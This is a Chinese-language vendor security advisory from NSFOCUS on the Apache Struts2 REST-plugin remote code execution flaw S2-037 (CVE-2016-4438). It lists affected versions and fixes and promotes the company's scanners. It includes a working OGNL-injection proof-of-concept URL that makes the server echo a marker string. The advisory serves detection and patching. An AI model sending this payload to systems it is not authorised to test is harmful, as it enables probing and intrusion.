WVSS和RSAS 助你快速检测Apache Struts2远程代码执行漏洞S2-037

Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,定名S2-037。该漏洞和S2-033漏洞触发流程基本一致,都是在ActionMapping中methodName带入到OGNL表达式中执行,从而导致任意代码执行。你还在担心无法快速确认自己的业务是否安全吗?WVSS和RSAS 助你快速确认风险。

漏洞综述

Apache Struts2再曝远程代码执行漏洞,攻击者可使用REST插件调用恶意表达式远程执行代码。此漏洞编号为CVE-2016-4438,定名为S2-037。

漏洞影响范围

全球分布图

Struts 2.3.20-Struts 2.3.28.1

所有安装REST插件的Struts应用

漏洞利用poc

http://127.0.0.1:8080/struts2-rest-showcase/orders/3//%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2b602%2b53718%2b1239876),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt reponse中回显paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt即存在该漏洞。

检测方法

绿盟科技客户可以使用绿盟Web应用漏洞扫描系统(NSFOCUS WVSS)和绿盟远程安全评估系统(NSFOCUS RSAS)检测自身应用系统是否存在漏洞。绿盟Web应用漏洞扫描系统(NSFOCUS WVSS)和绿盟远程安全评估系统(NSFOCUS RSAS)已在漏洞被曝出的第一时间内完美实现此漏洞的检测能力,可以通过更新插件库进行快、准、全的扫描发现。

漏洞名称

修复方法

1 加入cleanupActionName进行过滤;

2 使用Web应用防火墙等安全防护设备进行防护;

3 关注Apache官网及时更新至struts2.3.29: https://struts.apache.org/

参考官方通告:
https://cwiki.apache.org/confluence/display/WW/s2-037

声 明

本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司(简称绿盟科技)成立于2000年4月,总部位于北京。在国内外设有30多个分支机构,为政府、运营商、金融、能源、互联网以及教育、医疗等行业用户,提供具有核心竞争力的安全产品及解决方案,帮助客户实现业务的安全顺畅运行。

基于多年的安全攻防研究,绿盟科技在网络及终端安全、互联网基础安全、合规及安全管理等领域,为客户提供入侵检测/防护、抗拒绝服务攻击、远程安全评估以及Web安全防护等产品以及专业安全服务。

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易,股票简称:绿盟科技,股票代码:300369。

如果您需要了解更多内容,可以
加入QQ群:486207500、570982169
直接询问:010-68438880-8669

Spread the word. Share this post!

Meet The Author

Leave Comment